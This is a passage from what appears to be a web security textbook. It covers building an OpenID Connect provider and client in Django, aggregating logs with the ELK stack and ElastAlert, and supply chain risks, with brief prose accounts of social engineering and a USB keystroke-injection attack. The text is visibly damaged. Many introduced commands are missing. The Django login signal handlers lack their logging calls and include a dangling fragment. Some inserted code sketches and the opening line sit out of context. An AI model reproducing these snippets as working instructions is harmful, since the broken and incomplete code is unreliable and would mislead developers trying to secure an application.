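Passing the sleep function as a parameter keeps the example fast to run; a real client would use the default time.sleep.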
If the refresh token is valid for the client ID and has not expired, the
authorization server responds with a JSON string containing the new
access token and, optionally, a new refresh token.
11.9 OpenID Connect
OpenID Connect (OIDC) is for federated login. Instead of implementing
user management on your site, you can delegate it to another site where
the user has an account. This is the pattern used by sites that allow their
users to log in with a Google or Facebook account. The benefits include
The ID token is a JWT. We saw these in the last chapter, in Section 10.7.
As a minimum, it contains the sub claim containing the username, the scope
claim with the scopes the user is authorized with, and most likely an
expiry claim. The authorization server may add other information such as
the user’s real name. An example is
{
"sub": "bob",
"name": "Bob Smith",
"scope": ["read", "write"]
}
OIDC in Django
There are a number of packages that add OIDC support to Django. The
Django OAuth Toolkit we used in Section 11.2 provides the functionality
we need to write the provider but not the client. In the following exercise,
we will use it to build an OIDC provider into our Coffeeshop application.
We will test it by manually entering URLs, as we did in the previous
exercise. Later, we will use a different package to turn CSThirdparty into an
OIDC client.
We will use the Django OAuth Toolkit to make Coffeeshop an OIDC provider.
This will enable users at third-party sites to authenticate using their
Coffeeshop account. In this exercise, we will test the functionality manually
by entering URLs. In the next exercise, we will turn CSThirdparty into a proper
OIDC client.
We have the option of signing the ID token with an HMAC symmetric key or an
RSA private key. Let’s use RSA. In the Coffeeshop VM, create a key with
INSTALLED_APPS = (
...
'oauth2_provider',
)
# OAuth Settings
with open("/secrets/oidc.key", "r") as f:
    OIDC_RSA_PRIVATE_KEY = f.read()
OAUTH2_PROVIDER = {
    "PKCE_REQUIRED": False,
    "OAUTH2_VALIDATOR_CLASS":
        "coffeeshop.oauth_validator.CoffeeShopOAuth2Validator",
    "OIDC_ENABLED": True,  # set to True when providing OIDC login
    "OIDC_RSA_PRIVATE_KEY": OIDC_RSA_PRIVATE_KEY,
    "SCOPES": {
        "read": "Read scope",
        "write": "Write scope",
        "openid": "OpenID Connect scope",
    }
}
The first two lines read our new RSA private key and place it in the
OIDC_RSA_PRIVATE_KEY variable.
The authorization server and client have to share the notion of a user identifier.
In the Django OAuth Toolkit, this is the id from the user table by default. This
is numeric and quite meaningless to the user, as it is internal to Django. We
can configure Django OAuth Toolkit to use the username instead. We do this by
creating a custom validator class. The name of this class is set in the
OAUTH2_VALIDATOR_CLASS variable.
Since we are creating a new validator class anyway, let’s also provide the
user’s email address and real name to the client. Create a new file
coffeeshopsite/coffeeshop/oauth_validator.py
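from oauth2_provider.oauth2_validators import OAuth2Validator

class CoffeeShopOAuth2Validator(OAuth2Validator):
    # Hook called by Django OAuth Toolkit to add claims to the ID token.
    def get_additional_claims(self, request):
        return {
            "sub": request.user.username,
            "email": request.user.email,
            "first_name": request.user.first_name,
            "last_name": request.user.last_name,
        }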
If you didn’t in the last exercise, run the Django migrations with
sudo apachectl restart
The process to register the client is very similar to the previous exercise.
First, visit
http://10.50.0.2/admin
http://10.50.0.2/oauth/applications/
and delete the CSThirdparty application we created in the last exercise. Click
on the link provided to create a new application, or visit
http://10.50.0.2/oauth/applications/register/
Fill in the form as in Figure 11-13. Note down the new Client ID and Client
Secret, and then click Save. Now log out.
token. In the last exercise, we created a shell script called post.sh. We will
use the same script here. Ensure it still has the following, but substitute in your
new client ID and client secret:
curl -X POST \
    -H "Cache-Control: no-cache" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    "http://10.50.0.2/oauth/token/" \
    -d "client_id=YOUR_CLIENT_ID" \
    -d "client_secret=YOUR_CLIENT_SECRET" \
    -d "code=YOUR_AUTHORIZATION_CODE" \
    -d "redirect_uri=http://10.50.0.3/oauthcallback" \
    -d "grant_type=authorization_code"
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&scope=openid&redirect_uri=http://10.50.0.3/oauthcallback
again substituting in your client ID. You will be prompted to log in and then to
authorize CSThirdparty. When your browser is redirected to the redirect URI,
copy the authorization code, paste it into your shell script, and then execute it.
• An access token
• A refresh token
• An ID token
• An expiry time
• A scope of openid
The access token and refresh token work as before. The ID token is longer
because it has been signed.
The ID token is a regular JWT. We can decode the header and payload by
Base64-decoding it. Let’s do this on the command line with Bash commands.
Copy the ID token from the JSON string and paste it into a file, say, jwt.txt.
Now enter the following commands to split it into the header, payload, and
signature files:
Recall from the last chapter that the header, payload, and signature are
Base64Url-encoded. The Unix base64 command doesn’t decode these without
some preprocessing. We have a script in the Coffeeshop VM to automate this.
Decode the header with the command
cat firstline.txt | /vagrant/scripts/base64url_dec.sh
The kid value is an identifier indicating which key was used. We will see this
again later.
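The preprocessing that Base64Url decoding needs is mostly a matter of restoring the padding that JWTs leave off. The sketch below shows the idea in Python; it is not the script shipped in the Coffeeshop VM, the helper names are illustrative, and the token is built from made-up values rather than issued by a server.

```python
import base64
import json


def b64url_decode(segment):
    """Decode a Base64Url string, restoring the padding that JWTs omit."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def decode_jwt_unverified(token):
    """Return (header, payload) as dicts. The signature is NOT checked."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload


def _encode(obj):
    # Helper used only to build a made-up token for this demonstration.
    raw = json.dumps(obj).encode("utf-8")
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


example = ".".join([
    _encode({"alg": "RS256", "typ": "JWT", "kid": "example-key"}),
    _encode({"sub": "bob"}),
    "signature-placeholder",
])
header, payload = decode_jwt_unverified(example)
print(header["kid"], payload["sub"])
```

Decoding alone proves nothing about authenticity; the claims should only be trusted once the signature has been verified.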
cp firstline.txt headerpayload.txt
echo -n '.' >> headerpayload.txt
cat secondline.txt >> headerpayload.txt
We need the public key to verify the signature. The private key is in
/secrets/oidc.key. We saw how to extract the public key from a private
key in Chapter 4. Enter the following command:
Verified OK
The jwt.io website has a convenient tool for performing the same process.
Visit this site in your browser. You will see a page similar to Figure 11-14.
Paste your ID token under Encoded, and you should see the decoded header
and payload in the Decoded section.
The advantage of using RSA is that the signature can be verified without
having to distribute the secret key to each client. The OAuth2 definition
includes a standardized URL for requesting the public key. In your browser, or
using Curl, visit
http://10.50.0.2/oauth/.well-known/jwks.json
You should see a JSON response listing the OIDC keys on the authorization
server, indexed by the kid.
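A client uses the kid from the ID token header to pick the matching key out of this response. A minimal sketch of that lookup follows; find_key is a hypothetical helper and the key set is made up, with elided values, in the usual JSON Web Key Set shape.

```python
def find_key(jwks, kid):
    """Return the JWK whose kid matches, or None if there is no such key."""
    for key in jwks.get("keys", []):
        if key.get("kid") == kid:
            return key
    return None


# Made-up key set; real values come from the authorization server.
example_jwks = {
    "keys": [
        {"kty": "RSA", "kid": "old-key", "use": "sig", "n": "...", "e": "AQAB"},
        {"kty": "RSA", "kid": "current-key", "use": "sig", "n": "...", "e": "AQAB"},
    ]
}

print(find_key(example_jwks, "current-key")["kid"])
```

Publishing several keys at once is what allows a server to rotate its signing key without breaking tokens that were signed with the previous one.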
In this exercise, we will turn CSThirdparty into an OIDC client. Rather than
having users register at CSThirdparty to create an account, they will log in
using their existing Coffeeshop credentials.
To do this exercise, you will first need to complete the previous one: Build an
OIDC Provider in Django.
INSTALLED_APPS = [
...
'csthirdparty',
'oidc_rp',
]
MIDDLEWARE = [
...
'oidc_rp.middleware.OIDCRefreshIDTokenMiddleware',
]
# AUTH CONFIGURATION
# --------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = reverse_lazy('oidc_auth_request')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
    'oidc_rp.backends.OIDCAuthBackend',
    'django.contrib.auth.backends.ModelBackend',
]
The OIDC_RP_PROVIDER_ENDPOINT is the base URL that the client will use
to access the authorization server (the /authorize and /token endpoints).
The OIDC_RP_SCOPES variable is the list of scopes that will be requested
urlpatterns = [
    ...
    path('oidc/', include('oidc_rp.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
Finally, let’s make the index page only accessible to logged-in users by adding
the @login_required decorator to the view in csthirdpartysite/
csthirdparty/views.py:
@login_required
def index(request):
    ...
sudo apachectl restart
Before we can use the Coffeeshop OIDC Provider, we need to make a couple of
changes to it. Firstly, we need to add the Django OIDC RP’s default redirect
URI to the registered list. In your browser, visit
http://10.50.0.2/
http://10.50.0.2/oauth/applications
Log in as admin and click on CSThirdparty. Click the Edit button and
add the URI
http://10.50.0.3/oidc/auth/cb/
to the redirect URIs (see Figure 11-15). Don’t forget the trailing slash. Click the
Save button. Now log out by visiting
http://10.50.0.2/
Figure 11-15. Adding the Django OIDC RP’s default redirect URI
coffeeshopsite/coffeeshop/urls.py
urlpatterns = [
    ...
    path('oauth/token', oauth2_provider.views.TokenView.as_view()),
]
path('oauth/', include('oauth2_provider.urls',
namespace='oauth2_provider')),
in this file. This already adds the same mapping, but as oauth/token/ with
the trailing slash.
sudo apachectl restart
You should be redirected to the Coffeeshop login page. Enter Bob’s or Alice’s
username and password. Click Sign In and you should see the dialog in
Figure 11-16 requesting permission to use the credentials through OpenID
Connect. Click on Authorize and you will be logged in and taken to
CSThirdparty’s index page.
The client is performing all the activities we did manually in the previous
exercise:
11.10 Summary
OAuth2 allows applications to access a limited set of resources on another
server on a user’s behalf, with the user authenticating directly to that
server. It spares third-party applications from having to request credentials
such as a username and password from the user.
Unlike API keys, OAuth2 doesn’t need to persistently store any keys
or tokens belonging to the user. It also gives the user a more automatic,
integrated experience.
OAuth2 has different flows for clients which can keep secrets
confidential and clients which can’t. The latter includes JavaScript
applications where data is stored in the browser. When a user’s account is
needed and the client can keep the secret confidential, the authorization
code flow is recommended. Where the secret cannot be kept confidential,
the authorization code with PKCE flow should be used. When client-server
authorization is needed that doesn’t depend on user credentials, OAuth2
provides the client credentials flow.
OpenID Connect, or OIDC, is a federated login procedure based
on OAuth2. This enables developers to build applications that delegate
authentication to another server. When this happens, the secondary site
does not need to store user credentials.
In the next chapter, we turn to running the application and what
developers can do to make operation more secure.
CHAPTER 12
Logging and Monitoring
This is arguably the most important chapter in the book. Try as we may
to prevent attackers compromising our systems, there will always be a
chance that one will succeed. Damage, actual and reputational, can be
minimized by taking action early. Damage can even be prevented by acting
as soon as unauthorized access is attempted, before an attacker succeeds
in gaining entry.
In order to respond rapidly to unauthorized access, you must generate
logs, and you or an operations team must monitor them. This may also be
required by compliance departments. If you have several applications and
servers, manually looking through log files becomes unsustainable.
In this chapter, we will look at how to automatically consolidate log
files, from one or several servers, so they can be viewed and searched in
one place. We will set up the Elastic Stack, or ELK, which is a popular open
source toolset for logging and monitoring.
We will also look at how to create custom logging for our application,
beyond what is provided by Apache by default, and create alerts so that we
don’t miss important security events.
• Timestamp
• Client IP address
• URL
• Response code
Reading a single, aggregated log is better than reading several logs on
several hosts because you only have to look in one place. However, it is
difficult to read and analyze because it is large and entries appear in the
order sent, not necessarily in an order that shows a sequence of related
events. It is difficult to find important entries and to follow an attack vector.
Analytic engines help with this task by providing a query language and
dashboards. They can also generate alerts, sending emails or notifications
to tools such as Slack.
One popular toolset is Elastic Stack, also called ELK. Later in this
chapter, we will use this stack in an exercise to implement logging and
monitoring for Coffeeshop.
Chapter 12 Logging and Monitoring
logstash-yyyy.mm.dd-n
coffeeshop/vagrant/elk/apache.conf
input {
  file {
    path => "/var/log/apache2/*.log"
    start_position => "beginning"
  }
}
filter {
  if [path] =~ "access" {
    mutate { replace => { type => "apache_access" } }
    grok {
      match => { "message" => "%{COMBINEDAPACHELOG}" }
    }
    date {
      match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
    }
  } else if [path] =~ "error" {
    mutate { replace => { type => "apache_error" } }
  } else {
    mutate { replace => { type => "random_logs" } }
  }
}
output {
  elasticsearch {
    hosts => ["localhost:9200"]
  }
  stdout { codec => rubydebug }
}
The first section, input { ... }, defines the file sources. We are
loading all files from the /var/log/apache2 directory, starting at the
beginning of each file. Logstash understands file rotation. When a log file
reaches a certain size, Apache appends a number to it and creates a new
log file. Once log files reach a certain age, they are compressed. Logstash
understands this and ensures log entries are not duplicated when it
parses them.
The second section, filter { ... }, tells Logstash how to parse the
files. Apache’s error and access logs have different formats, so we parse
them differently, using an if statement to check the file name:
if [path] =~ "access" {
...
} else if [path] =~ "error" {
...
} else {
...
}
Logstash assigns a type to each log file. It puts this in the type field. The
default is _doc.
Logstash creates the following additional fields:
These fields are sufficient for our Apache error log files, so we don’t
do any further processing, other than to replace the value of type with
apache_error in the line:
grok {
match => { "message" => "%{COMBINEDAPACHELOG}" }
}
date {
match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
}
This replaces the default parsing for the timestamp field. Apache error
log timestamps are formatted according to the Logstash default. Apache
access log timestamps are not, so we need to declare the correct syntax.
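To make the date pattern concrete, here is roughly how the same Apache access log timestamp format would be parsed in Python. The format string is a translation of the Logstash pattern into strptime directives, and the sample timestamp is made up.

```python
from datetime import datetime

# Python equivalent of the Logstash pattern "dd/MMM/yyyy:HH:mm:ss Z".
APACHE_ACCESS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Made-up timestamp in the Apache access log style.
parsed = datetime.strptime("10/Oct/2023:13:55:36 +0200", APACHE_ACCESS_FORMAT)
print(parsed.isoformat())
```

The result carries the time zone offset from the log entry, which is what lets entries from hosts in different zones be ordered correctly once they are aggregated.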
The last section in the file, output { ... }, defines where to send the
parsed log entries. We are sending them to two locations: elasticsearch
and stdout. For elasticsearch, we define the host and port Elasticsearch
is running on. For stdout, we use the rubydebug plug-in to format it. This
is the default value. Another possibility is json.
1 https://github.com/logstash-plugins/logstash-patterns-core
Installing ELK
cd /vagrant/elk
sudo bash install-elk.sh
1. Add Elastic to the Apt sources list so that we can fetch the
latest versions with apt-get.
You should now see a screen like Figure 12-2 (if you have a wizard popover,
close it first). The log entries you see in the section on the right will differ.
Click + Add Filter (highlighted in the figure). In the popup, select type from the
Field drop-down (not _type with the leading underscore character), select is
from the Operator drop-down, and enter apache_access under Value. This is
shown in Figure 12-3. Click Save.
Let’s create a more complex query to view accesses on the admin console
login page. This time we need to use Elasticsearch’s query language,
DSL. Leave the type: apache_access filter we previously created as it is. Click
+ Add Filter again.
Now click Edit as Query DSL at the top right of the filter popup. Enter the text
as shown in Figure 12-4. You will find this text in the file
coffeeshop/vagrant/elk/dsl/admin-login.dsl
Click Save. This is a simple wildcard search on the request field, which
contains the URL from the HTTP request.
coffeeshop/secrets/config.env
Go back to Kibana and click Refresh. You should see your login attempt.
As we parsed the access log file when creating the apache.conf file, we
can make the output easier to read by customizing the fields. At the left of
the Kibana screen, hover over clientip and click the + button. Do the same
for verb, request, and response. Your screen should look something like
Figure 12-5. If you like, you can save the query for reuse later.
If you followed the preceding exercise, the ELK stack will now be
running in your virtual machine and enabled each time you start the VM
with vagrant up. It can consume a lot of CPU. If you find this, you can
disable it with
DEBUG = True
/var/log/apache2/error.log
We could create our own custom login and logout messages and also
send them to the console, but in order for ELK to parse them into fields, we
need to have a common format for each line in this file. A better solution is
to create a separate file to log them to. We can do this in Django by setting
the LOGGING variable in settings.py.
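By default, Django passes the LOGGING dictionary to Python's logging.config.dictConfig, so the idea of a dedicated log file can be tried outside Django. The sketch below is a standalone illustration: it writes to a temporary directory, and the logger name, formatter, and message text are chosen for the demonstration.

```python
import logging
import logging.config
import os
import tempfile

log_path = os.path.join(tempfile.mkdtemp(), "login.log")

logging.config.dictConfig({
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        "timestamp": {"format": "{asctime} {message}", "style": "{"},
    },
    "handlers": {
        "login": {
            "level": "INFO",
            "class": "logging.FileHandler",
            "filename": log_path,
            "formatter": "timestamp",
        },
    },
    "loggers": {
        "login": {"handlers": ["login"], "level": "INFO", "propagate": False},
    },
})

# The message text here is invented for the demonstration.
logging.getLogger("login").info("example login event")

with open(log_path) as f:
    line = f.read().strip()
print(line)
```

Every line in the file starts with a timestamp followed by the message, which is the kind of uniform layout a log parser needs.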
This exercise builds on the previous one, so make sure you have completed it
first. We will observe successful logins, successful logouts, and failed logins in
Kibana. There are four steps:
This exercise relies on the previous one, in which we installed the ELK stack.
If you did not do that exercise, please complete it first. If you did do it, and you
restarted your VM since then, you will need to restart the ELK stack manually
by running the following inside your Coffeeshop VM:
cd /vagrant/elk
sudo bash ./enable.sh
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'timestamp': {
            'format': '{asctime} {message}',
            'style': '{',
        },
    },
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
        },
        'login': {
            'level': 'INFO',
            'class': 'logging.FileHandler',
            'filename': '/var/log/django/login.log',
            'formatter': 'timestamp'
        },
    },
    'root': {
        'handlers': ['console'],
        'level': 'WARNING',
    },
    'loggers': {
        'django': {
            'handlers': ['console'],
            'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
            'propagate': False,
        },
        'login': {
            'handlers': ['login'],
            'level': 'INFO',
            'propagate': False,
        },
    },
}
This configures Django to write to a new log file. We will have to create the
directory. Enter the following inside your Coffeeshop VM:
vagrant/coffeeshopsite/coffeeshop/signals.py
import logging
from django.contrib.auth.signals import user_logged_in, user_logged_out, user_login_failed
from django.dispatch import receiver

log = logging.getLogger('login')

@receiver(user_logged_in)
def user_logged_in_callback(sender, request, user, **kwargs):
    ip = request.META.get('REMOTE_ADDR')
    uri = request.META.get('PATH_INFO')
    if request.META.get('QUERY_STRING'):
        uri += '?' + request.META.get('QUERY_STRING')

@receiver(user_logged_out)
def user_logged_out_callback(sender, request, user, **kwargs):
    ip = request.META.get('REMOTE_ADDR')
    uri = request.META.get('PATH_INFO')
    if request.META.get('QUERY_STRING'):
        uri += '?' + request.META.get('QUERY_STRING')
uri=uri
))
@receiver(user_login_failed)
def user_login_failed_callback(sender, credentials, request, **kwargs):
    user = credentials['username']
    ip = request.META.get('REMOTE_ADDR')
    uri = request.META.get('PATH_INFO')
    if request.META.get('QUERY_STRING'):
        uri += '?' + request.META.get('QUERY_STRING')
We have one function for each of the three signals sent by the auth module. The
@receiver decorator binds each function to a signal. In each case, we want to
send a message to the login logger. We arbitrarily choose level INFO. We will
log the username, IP address, and URI as well as success or failure.
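The following sketch shows one way such a message could be assembled and sent to the login logger. It runs without Django by using a stand-in request object. The field order and the space-separated layout are assumptions made for this example, not the format used in the Coffeeshop code, and request_uri and format_event are hypothetical helpers.

```python
import logging
from types import SimpleNamespace

log = logging.getLogger("login")


def request_uri(request):
    """Rebuild the path plus query string, as the handlers above do."""
    uri = request.META.get("PATH_INFO")
    if request.META.get("QUERY_STRING"):
        uri += "?" + request.META.get("QUERY_STRING")
    return uri


def format_event(user, ip, action, status, uri):
    """Assumed layout: space-separated fields, one event per line."""
    return "{user} {ip} {action} {status} {uri}".format(
        user=user, ip=ip, action=action, status=status, uri=uri
    )


# Stand-in for a Django request; only META is needed here.
fake_request = SimpleNamespace(META={
    "REMOTE_ADDR": "10.50.0.1",
    "PATH_INFO": "/account/login/",
    "QUERY_STRING": "next=/",
})
message = format_event("bob", fake_request.META.get("REMOTE_ADDR"),
                       "login", "success", request_uri(fake_request))
log.info(message)
print(message)
```

Keeping every event in one fixed layout is what makes it practical to split the line back into fields when the file is parsed later.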
We need to activate these signal handlers when the application starts. A good
place to do this is in the ready() function in CoffeeshopConfig. Edit the
vagrant/coffeeshopsite/coffeeshop/apps.py
from django.apps import AppConfig

class CoffeeshopConfig(AppConfig):
    name = 'coffeeshop'

    def ready(self):
        # Implicitly connect the signal handlers decorated with @receiver.
        from . import signals
Now restart Apache by running the following within the Coffeeshop VM:
Configure Logstash
We need to replace
/etc/logstash/conf.d/apache.conf
/vagrant/elk/apachedjango.conf
We are adding the following to the original conf file. First, we define a new file
source in the input { ... } section:
file {
path => "/var/log/django/login.log"
start_position => "beginning"
}
Second, we are adding a new else clause to the filter { ... } section:
date {
match => [ "timestamp" , "yyyy-MM-dd HH:mm:ss,SSS" ]
}
}
The match line in grok parses the message field into some new fields.
TIMESTAMP_ISO8601, WORD, etc., are built-in Logstash templates. We are
reusing some fields that have already been created when parsing the Apache
access.log file, for example, for the username. The [user][identity]
syntax means the value will be placed in a variable called user.identity.
The match line within date parses the ISO 8601 timestamps that were
extracted by grok. Without this, Logstash would use the time it processed the
log entry rather than the timestamp contained within it.
Restart Logstash with
Configure Kibana
http://10.50.0.2:5601
in a web browser.
As in the last exercise, we are going to create a filter, this time on the new
django_login type we created previously. From the two-horizontal-bar menu
at the top right of Kibana, select Discover under Analytics. Click + Add filter, as
in Figure 12-2. For Field, select type. For Operator, select is. Under Value, enter
django_login and click Save.
Let’s make a few login and logout records. In another tab or browser
window, visit
http://10.50.0.2/account/login/
and make a failed login attempt (e.g., with xxx as the username and
password). Now log in correctly as either bob or alice and then log out. Go
back to Kibana and click the Refresh button at the top right. You should see a
screen similar to Figure 12-6.
Let’s customize the table so it’s easier to read. From the fields list at the left
of the screen, hover over each of the following to see the plus button and then
click it to add the field to the table:
• source.address
• user.identity
• action
• status
In the exercise, we will use the Any type. For more details on the
others, see the ElastAlert documentation.2
ElastAlert is designed to be run as a daemon, for example, with the
Python zdaemon process controller or as a systemd service.
This exercise builds on the previous two, so make sure you have completed
them first. We will use ElastAlert to send an email whenever someone
successfully logs in as admin. We have MailCatcher set up in the Coffeeshop
VM, so we will use it as our SMTP server.
Configuring ElastAlert
/vagrant/elk/elastalert/config.yaml
https://github.com/Yelp/elastalert.git
Our configuration file does not differ much from the example. The line
rules_folder: /vagrant/elk/elastalert/rules
2
See https://elastalert.readthedocs.io/en/latest/ruletypes.html
points ElastAlert at a directory containing rules. We have just one rule in our
directory. The lines
es_host: localhost
and
es_port: 9200
tell ElastAlert where to find Elasticsearch. We also tell ElastAlert to run every minute and buffer for 15 minutes in
case some alerts are not received in real time.
sudo elastalert-create-index
For the Elasticsearch host and port, enter localhost and 9200, respectively.
Enter f for Use SSL. You can choose the defaults for all other options.
filter:
- term:
type: "django_login"
- term:
user.identity: admin
- term:
action: login
include:
- timestamp
- host
- user.identity
- source.address
- status
alert_text: |-
Login as {} on {} from {} {}
alert_text_args:
- user.identity
- host
- source.address
- status
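The way the term filters and alert_text_args combine can be illustrated in Python. This is only a sketch of the logic, not ElastAlert's own code: the helper names lookup and render_alert are hypothetical, and the sample event values are invented.

```python
def lookup(event, dotted):
    """Resolve a dotted field name such as "user.identity" in a nested dict."""
    value = event
    for part in dotted.split("."):
        if not isinstance(value, dict) or part not in value:
            return None
        value = value[part]
    return value


# The three term filters from the rule: all of them must match.
TERMS = {"type": "django_login", "user.identity": "admin", "action": "login"}
ALERT_TEXT = "Login as {} on {} from {} {}"
ALERT_TEXT_ARGS = ["user.identity", "host", "source.address", "status"]


def render_alert(event):
    """Return the alert text if the event matches every term, else None."""
    if any(lookup(event, field) != wanted for field, wanted in TERMS.items()):
        return None
    # Each {} placeholder is filled, in order, by one listed field.
    return ALERT_TEXT.format(*(lookup(event, f) for f in ALERT_TEXT_ARGS))


sample = {  # hypothetical event, values invented for illustration
    "type": "django_login",
    "action": "login",
    "status": "success",
    "host": "coffeeshop",
    "user": {"identity": "admin"},
    "source": {"address": "10.50.0.1"},
}
print(render_alert(sample))
```

An event for any other user, or for a logout, fails one of the term checks and produces no alert.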
We set the alert type to Email and configure the recipient address with
alert:
- "email"
email:
- "[email protected]"
The file also contains connection details for the SMTP server.
Running ElastAlert
Now log out of Coffeeshop if you are logged in already and then visit
http://10.50.0.2/admin
We have set the --verbose flag on ElastAlert, so you should see it detect
the login. It may take a minute or two as it only runs every 60 seconds. Open
MailCatcher by visiting
http://10.50.0.2:1080
12.5 Summary
Logging and monitoring are essential for spotting and responding to
intrusions or intrusion attempts. Web servers, database servers, operating
systems, and web applications all produce logs, but monitoring them
regularly is difficult without an aggregation and search toolset such as the
ELK stack.
Logging applications such as Kibana don’t always get looked at
regularly enough to act on critical security events promptly. Alert tools
such as ElastAlert can filter events and send them to other channels that
are monitored more frequently, such as email or Slack.
CHAPTER 13
Third-Party
and Supply Chain
Security
In this chapter, we turn to security topics beyond writing code but that
nonetheless affect our application security: developers and their devices,
third-party components, and supply chain security.
People are often the weakest link in application security. Attackers
know this and therefore target organizations’ staff in preference to finding
code vulnerabilities. Fortunately, there are defenses against such attacks,
and we will look at those in this chapter.
All code depends in some form on third-party components and
applications. We have already looked at services such as web servers and
databases. In this chapter, we will look at the components that get included
in your code base, such as frameworks, packages, and libraries.
Writing code is only one step in the process from text editor to running
application. In between, we often have source code control, continuous
integration and continuous delivery (CI/CD), and container repositories
such as Docker Registry. These form a kind of supply chain from code to
application and can introduce vulnerabilities along the way. We conclude
this chapter by looking at a framework to make the entire supply chain
more secure.
Developers often store SSH keys, as well as sensitive source code, on laptops
which they take out of the office, on public transport, on holidays, to cafes,
and other public locations. They also have session IDs on these laptops with
access to your web application, source code control, and other services.
• Job advertisements
• Public tenders
• Social media
Example 1
A company has its organizational chart on its website. An attacker learns
that an application operator is on holiday and uses the chart to phone
someone else in the same or a related department, pretending to be a
customer. For example, he may wish to change his registered address.
By pressuring a staff member who has access but is not familiar with
the correct process for changing customer data, the attacker bypasses
corporate procedures and convinces the other staff member to make
the change.
Example 2
A company places a job advertisement for a developer. In order to attract
the best applicants, the advertisement lists the technologies the company
uses. It gives the name, email address, and phone number of the hiring
manager for applicants to apply to or ask questions.
The attacker searches the Internet for the hiring manager. Using
resources such as social media, online address books, local newspapers,
and social clubs, the attacker finds her address and photograph. As the
attacker also knows the company address, he waits at the local train station
on weekday mornings until he finds the hiring manager. Distracting her, he
steals her laptop and copies her SSH keys.
Example 3
An attacker visits the company offices where, from the company’s website,
she knows developers work. She leaves a few Rubber Duckies lying near
the entrance. A Rubber Ducky is a USB dongle that looks like a USB storage
device but in fact implements the USB keyboard protocol.1 When plugged
into a computer, it sends preprogrammed keystrokes. The attacker has
programmed it to send SSH keys over HTTP to her server.
1
See https://shop.hak5.org/products/usb-rubber-ducky-deluxe
13.2 Third-Party Code
Our applications always depend on third-party code, tools, and
frameworks. These include
• The operating system and its packages
• JavaScript packages
Back-End Dependencies
Back-end dependencies can introduce intentional and unintentional
vulnerabilities. A malicious developer can release a tool that looks useful
enough for other developers to include in their applications but that
also contains malware. This may be a backdoor for gaining shell access
or spyware for receiving data from your application. Alternatively, they
can add malicious code to existing packages, for example, through
merge requests on GitHub. In a recent incident, uncovered by a security
researcher at Sonatype,2 malicious code was added to a number of Python
packages to exfiltrate secrets such as AWS credentials.
For our examples, we have used Django. This has its own
dependencies, plus we have downloaded other packages such as django-
cors-headers and django-csp. Any of these packages could contain
vulnerabilities.
2
See www.msn.com/en-us/news/technology/malicious-python-packages-dump-your-aws-secrets-online/ar-AAYVmnz
To defend against backdoors, block all ports except for those you
need. Use a host firewall or TCP Wrappers to block or limit access to all
other ports (see Section 5.7). This also defends against unintentional
vulnerabilities. If a package offers a service over a port that you don’t need,
it is safest to block the port in case it is vulnerable.
Front-End Dependencies
Modern JavaScript packages can have hundreds of JavaScript
dependencies. For example, creating a skeleton Angular application, even
without any of your own code and dependencies, downloads over 900
JavaScript packages.
The npm package manager can scan for known vulnerabilities in
downloaded packages. The command is
npm audit
This does not work in all cases. Packages can have complex
dependencies, and if the developer of one needs a particular version of a
package, and that version has a vulnerability, then it cannot be removed
without removing your dependency on the original package.
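Because some findings cannot be fixed immediately, teams often decide per severity whether a finding should block a build. The sketch below summarizes the JSON output of npm audit --json. The metadata.vulnerabilities layout is an assumption about the report format and may differ between npm versions, and the sample report is hand-written rather than real output.

```python
import json


def audit_counts(report_json):
    """Extract per-severity vulnerability counts from an audit report."""
    report = json.loads(report_json)
    # Assumed layout: {"metadata": {"vulnerabilities": {"high": 2, ...}}}.
    return report.get("metadata", {}).get("vulnerabilities", {})


def should_fail_build(counts, blocking=("high", "critical")):
    """True if any blocking severity has at least one finding."""
    return any(counts.get(level, 0) > 0 for level in blocking)


# Hypothetical sample standing in for real `npm audit --json` output.
sample = (
    '{"metadata": {"vulnerabilities": '
    '{"low": 3, "moderate": 1, "high": 2, "critical": 0}}}'
)
counts = audit_counts(sample)
print(counts, should_fail_build(counts))
```

Which severities block a build is a policy decision; the default used here is only one reasonable choice.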
JavaScript packages can also contain unknown vulnerabilities.
Developers of sites for which security is critical often avoid big frameworks
with many dependencies for critical code. For example, they avoid React,
Angular, and similar frameworks for login pages and pages requesting credit card details.
Instead, they handcraft all the JavaScript used for these pages and use CSP
to ensure no other dependencies are unintentionally loaded.
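As an illustration of such a restrictive policy, the following Python sketch assembles a Content-Security-Policy header value that permits only same-origin scripts and styles. The helper build_csp and the particular directives chosen are assumptions for this example. In a Django project, a package such as django-csp would normally set the header for you.

```python
def build_csp(directives):
    """Join a mapping of CSP directives into a single header value."""
    return "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )


# Hypothetical policy for a login page: nothing loads unless listed here.
LOGIN_PAGE_POLICY = {
    "default-src": ["'none'"],
    "script-src": ["'self'"],
    "style-src": ["'self'"],
    "form-action": ["'self'"],
}

header_value = build_csp(LOGIN_PAGE_POLICY)
print("Content-Security-Policy:", header_value)
```

With default-src set to 'none', any script from a third-party origin is refused by the browser, even if a dependency tries to load it.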
Using big frameworks like React for part of an application and not for
others introduces discontinuities in the application’s look and feel. If this is
an issue, the critical code can be encapsulated in an iframe with corporate
branding in the rest of the page. Encapsulating critical code in an iframe
prevents data leaking to the surrounding page.
3
See https://security.googleblog.com/2021/06/introducing-slsa-end-to-end-framework.html
4
See https://in-toto.io/in-toto/
determined by a file (in JSON format in the case of in-toto) that describes
the steps that were taken to derive an object, such as a Git clone or Jenkins
build. An attestation is achieved by signing this file to demonstrate that the
owner of the key attests that the process described in the file was followed.
